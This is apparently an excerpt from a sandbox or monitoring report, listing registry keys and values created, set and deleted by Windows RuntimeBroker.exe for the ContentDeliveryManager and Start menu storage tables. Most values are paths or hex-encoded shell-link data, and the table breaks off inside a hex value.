| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58318078e6a30ee7ec4597ee1fb7a40bfa94836468c204e06ef9029ba038d7e0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2dcfc67fe523e1f6f503602bbb5f955d40b381101dbfc4fdf0b856311a7e53a2" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000f6d1d7b3dc9db01848ea07b3dc9db01848ea07b3dc9db01ee3809000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000326463666336376665353233653166366635303336303262626235663935356434306233383131303164626663346664663062383536333131613765353361320000b20009000400efbeb45aa221b45aa2212e000000000000000000000000000000000000000000000000005cac9800320064006300660063003600370066006500350032003300650031006600360066003500300033003600300032006200620062003500660039003500350064003400300062003300380031003100300031006400620066006300340066006400660030006200380035003600330031003100610037006500350033006100320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32646366633637666535323365316636663530333630326262623566393535643430623338313130316462666334666466306238353633313161376535336132000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1eb2f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1eb2f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\156b72c5e65c061eb4663b015eec1f0fada4bdcb27c7635cfb0b5a948bf4cd48" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009fe5f47a3dc9db019fe5f47a3dc9db019fe5f47a3dc9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000643766306539616638633462633036623331373235313035373365636639353063663737353962643738306661643738643330346230336431363738623864660000b20009000400efbeb45aa221b45aa2212e0000000000000000000000000000000000000000000000000061228f00640037006600300065003900610066003800630034006200630030003600620033003100370032003500310030003500370033006500630066003900350030006300660037003700350039006200640037003800300066006100640037003800640033003000340062003000330064003100360037003800620038006400660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64376630653961663863346263303662333137323531303537336563663935306366373735396264373830666164373864333034623033643136373862386466000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1e72f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1e72f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = 6438fd7b3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d891627b3dc9db01a59d107c3dc9db01a59d107c3dc9db01eb7c0a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000643766306539616638633462633036623331373235313035373365636639353063663737353962643738306661643738643330346230336431363738623864660000b20009000400efbeb45aa221b45aa2212e0000000000000000000000000000000000000000000000000061228f00640037006600300065003900610066003800630034006200630030003600620033003100370032003500310030003500370033006500630066003900350030006300660037003700350039006200640037003800300066006100640037003800640033003000340062003000330064003100360037003800620038006400660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64376630653961663863346263303662333137323531303537336563663935306366373735396264373830666164373864333034623033643136373862386466000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1ee2f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1ee2f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = 9e78b67b3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = ad8e467c3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\32c1033c1063e73bda331eccb913520fcc27c5e3a6ae46ac9db9daad25815e56" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- = 830b2b7c3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dc7a540c510e51f15f1e52344479a09b42aa587b1ea02dfee89b07ab978e1f1e" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d192437b3dc9db01a4b2e57b3dc9db01a4b2e57b3dc9db01020b08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000333263313033336331303633653733626461333331656363623931333532306663633237633565336136616534366163396462396461616432353831356535360000b20009000400efbeb45aa221b45aa2212e0000000000000000000000000000000000000000000000000073fc8700330032006300310030003300330063003100300036003300650037003300620064006100330033003100650063006300620039003100330035003200300066006300630032003700630035006500330061003600610065003400360061006300390064006200390064006100610064003200350038003100350065003500360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33326331303333633130363365373362646133333165636362393133353230666363323763356533613661653436616339646239646161643235383135653536000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1ed2f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1ed2f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000